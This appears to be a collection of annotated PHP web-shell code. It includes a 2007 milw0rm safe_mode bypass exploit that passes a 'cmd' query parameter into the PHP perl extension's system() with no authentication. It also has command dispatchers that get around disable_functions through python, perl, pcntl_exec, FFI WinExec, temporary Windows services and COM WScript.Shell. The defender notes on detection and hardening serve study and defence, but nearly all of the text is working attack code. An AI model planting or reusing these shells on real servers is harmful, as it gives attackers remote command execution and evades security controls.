/**
 * Web-shell helper: runs an operating-system command through the PHP "perl"
 * extension and returns whatever the command printed.
 *
 * Defender notes:
 *  - The command never passes through PHP's own exec/system family, so a
 *    disable_functions list that names only those functions does not cover
 *    this path. The effective control is not loading the perl extension on
 *    web-facing hosts.
 *  - $command is interpolated into the Perl source unmodified, so the caller
 *    fully controls the Perl code that is evaluated.
 *  - In source review, `new perl()` followed by `->eval("system(` is a
 *    distinctive marker of this web-shell family.
 *
 * @param string $command Command line embedded verbatim into a Perl system() call.
 * @return string Output captured from the output buffer while the Perl code ran.
 */
function perlshelL($command)
{
    $perl = new perl();
    // Buffer output so the command's stdout can be captured instead of being sent to the client.
    ob_start();
    $perl->eval("system(\"{$command}\")");
    $exec = ob_get_contents();
    ob_end_clean();
    return $exec;
}
/**
 * Web-shell command dispatcher: tries a chain of execution primitives until
 * one is available, storing the output in the global $result.
 *
 * Defender notes:
 *  - When the SAFEMODE constant is truthy the code avoids PHP's process
 *    functions and goes through the "python" or "perl" extensions, which are
 *    separate interpreters embedded in PHP. Restrictions placed on PHP's own
 *    functions do not automatically apply to them.
 *  - Otherwise it walks exec, shell_exec, system, passthru and popen in that
 *    order. A disable_functions policy has to cover all of them to close this
 *    branch; naming only the best-known ones leaves a later fallback open.
 *  - Almost every call is prefixed with `@`, so failures do not appear as PHP
 *    warnings. Detection is more dependable at the process level (the web
 *    server or PHP worker spawning a shell or interpreter).
 *  - funcex() and SAFEMODE are defined outside this listing; funcex()
 *    presumably reports whether a function is callable — TODO confirm.
 *
 * @param string $cmd Command line; passed unmodified to every primitive.
 * @return mixed Command output; see the inline notes for branches that
 *               return something else.
 */
function ex($cmd)
{
    // Output is kept in a global, so a value left by an earlier call can be returned unchanged.
    global $result;
    if (!empty($cmd)) {
        if (SAFEMODE) {
            if (extension_loaded("python")) {
                // $cmd is interpolated into Python source and run via os.system().
                $result = python_eval("import os\nos.system('{$cmd}')");
                if (empty($result)) {
                    // This second string is single-quoted, so PHP passes its contents
                    // (including "$cmd" and the backslash sequences) literally.
                    $result = python_eval('import os\\npwd = os.getcwd()\\nprint pwd\\nos.system("$cmd")');
                }
                return $result;
            } elseif (extension_loaded("perl")) {
                $perl = new perl();
                $perl->eval("system('{$cmd}')");
                // The perl object itself is returned here, not captured output.
                $result = $perl;
                return $result;
            }
            // Neither extension loaded: falls through and returns the existing global value.
        } else {
            if (funcex("exec")) {
                // exec() fills $result with an array of output lines, joined below.
                @exec($cmd, $result);
                $result = join("\n", $result);
            } elseif (funcex("shell_exec")) {
                $result = @shell_exec($cmd);
            } elseif (funcex("system")) {
                // system() and passthru() print directly, hence the output buffering.
                @ob_start();
                @system($cmd);
                $result = @ob_get_contents();
                @ob_end_clean();
            } elseif (funcex("passthru")) {
                @ob_start();
                @passthru($cmd);
                $result = @ob_get_contents();
                @ob_end_clean();
            } elseif (@is_resource($f = @popen($cmd, "r"))) {
                // Last resort: read the child's stdout from a pipe in 8 KiB chunks,
                // appending to whatever $result already held.
                while (!@feof($f)) {
                    $result .= @fread($f, 8192);
                }
                @pclose($f);
            }
        }
    }
    return $result;
}
Example #3
<?php

##########################################################
###----------------------------------------------------###
###----PHP Perl Extension Safe_mode Bypass Exploit-----###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################
// Analysis notes (defender view):
//  - This page exposes operating-system command execution to anyone who can
//    request it: the `cmd` query parameter is concatenated into Perl source
//    and evaluated by the PHP "perl" extension, with no authentication.
//  - The technique only works where the perl extension is loaded. Auditing
//    loaded extensions (php -m / phpinfo) and removing perl from web-facing
//    PHP builds is the mitigation; restrictions on PHP's own functions do not
//    reach Perl's system().
//  - Web-server access logs will show the command in the query string
//    (?cmd=...), which is a practical hunting signal for this file.
if (!extension_loaded('perl')) {
    die('perl extension is not loaded');
}
// Legacy fallback to the old long-array name when $_GET is not set.
if (!isset($_GET)) {
    $_GET =& $HTTP_GET_VARS;
}
// With no command supplied, default to a directory listing for the detected OS.
if (empty($_GET['cmd'])) {
    $_GET['cmd'] = strtoupper(substr(PHP_OS, 0, 3)) == 'WIN' ? 'dir' : 'ls';
}
$perl = new perl();
echo "<textarea rows='25' cols='75'>";
// Request input reaches Perl's system() unmodified; the command's output is
// written into the page without HTML escaping.
$perl->eval("system('" . $_GET['cmd'] . "')");
echo "</textarea>";
// Escaping happens only after execution and only for redisplay. It is called
// without ENT_QUOTES while the value attribute below is single-quoted, so on
// PHP versions whose default flags leave single quotes unescaped the
// reflected value is not safely contained.
$_GET['cmd'] = htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='" . $_GET['cmd'] . "' size=25></form>";
?>

# milw0rm.com [2007-08-25]
Example #4
/**
 * Obfuscated web-shell command runner that uses PHP extensions instead of
 * PHP's own process functions, choosing a mechanism per platform.
 *
 * Non-Windows ($win falsy): perl extension, else pcntl_fork + pcntl_exec of
 * a perl binary. Windows: FFI call to WinExec, a throwaway Windows service
 * (win32service), win32std's win_shell_execute, or COM WScript.Shell.
 * Except for the perl-extension branch, output is redirected to a temporary
 * file under $tempdir, read back with z9p() and then deleted.
 *
 * Defender notes (artefacts visible in this code):
 *  - Temp files named with uniqid() and the prefix "pcntl" or "NJ" under the
 *    shell's temp directory, created and removed within one request.
 *  - A Windows service whose name and display name are "NJ" plus a uniqid()
 *    suffix, with cmd.exe as its binary path, created, started, stopped and
 *    deleted in quick succession. Service-install events are a strong signal.
 *  - The web server / PHP worker spawning cmd.exe or perl.
 *  - Hardening: do not load perl, pcntl, ffi, win32service, win32std or COM
 *    support in web-facing PHP; a function-level deny list alone does not
 *    cover all of these paths.
 *  - z7r(), z6l() and z9p() are defined outside this listing. From their use
 *    here they presumably test function availability, prepare the command
 *    string, and read a file respectively — TODO confirm against the full file.
 *
 * @param string $c Command line to run.
 * @return mixed Captured output, or '' when $c is empty or no branch ran.
 */
function z6v($c)
{
    global $win, $tempdir;
    $r = '';
    if (!empty($c)) {
        if (!$win) {
            if (extension_loaded('perl')) {
                // Embedded Perl interpreter; output captured through PHP's output buffer.
                @ob_start();
                $p = new perl();
                $p->eval("system('{$c}')");
                $r = @ob_get_contents();
                @ob_end_clean();
            } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
                $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
                // $o: temp file that receives the command's redirected output.
                $o = $tempdir . uniqid('pcntl');
                $pid = @pcntl_fork();
                if ($pid == -1) {
                    $r .= '[-] Could not fork. Exit';
                } elseif ($pid) {
                    // Parent process. NOTE(review): $status is not assigned anywhere in the visible code.
                    $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
                } else {
                    // Child process: replaces itself with a perl binary at one of two fixed paths.
                    $c = array(" -e 'system(\"{$c} > {$o}\")'");
                    if (@pcntl_exec('/usr/bin/perl', $c)) {
                        exit(0);
                    }
                    if (@pcntl_exec('/usr/local/bin/perl', $c)) {
                        exit(0);
                    }
                    die;
                }
                // Overwrites the status text built above with the temp file's contents.
                $r = z9p($o);
                @unlink($o);
            }
        } else {
            // Windows: every branch redirects cmd.exe output into this temp file.
            $o = $tempdir . uniqid('NJ');
            if (extension_loaded('ffi')) {
                // Calls WinExec from kernel32.dll through the FFI extension.
                $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
                $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
                // Polls once per second until the output file exists; there is no timeout.
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded('win32service')) {
                // Registers a short-lived service that runs cmd.exe, then removes it.
                $s = uniqid('NJ');
                @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
                @win32_start_service($s);
                @win32_stop_service($s);
                @win32_delete_service($s);
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded("win32std")) {
                // cmd.exe is addressed through a relative path made of repeated "..\" segments.
                @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } else {
                // Fallback: Windows Script Host via COM. The file is read straight
                // after Run() without the existence poll used in the other branches.
                $a = new COM("WScript.Shell");
                $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                $r = z9p($o);
            }
            // The output file is deleted after reading, so little remains on disk afterwards.
            @unlink($o);
        }
    }
    return $r;
}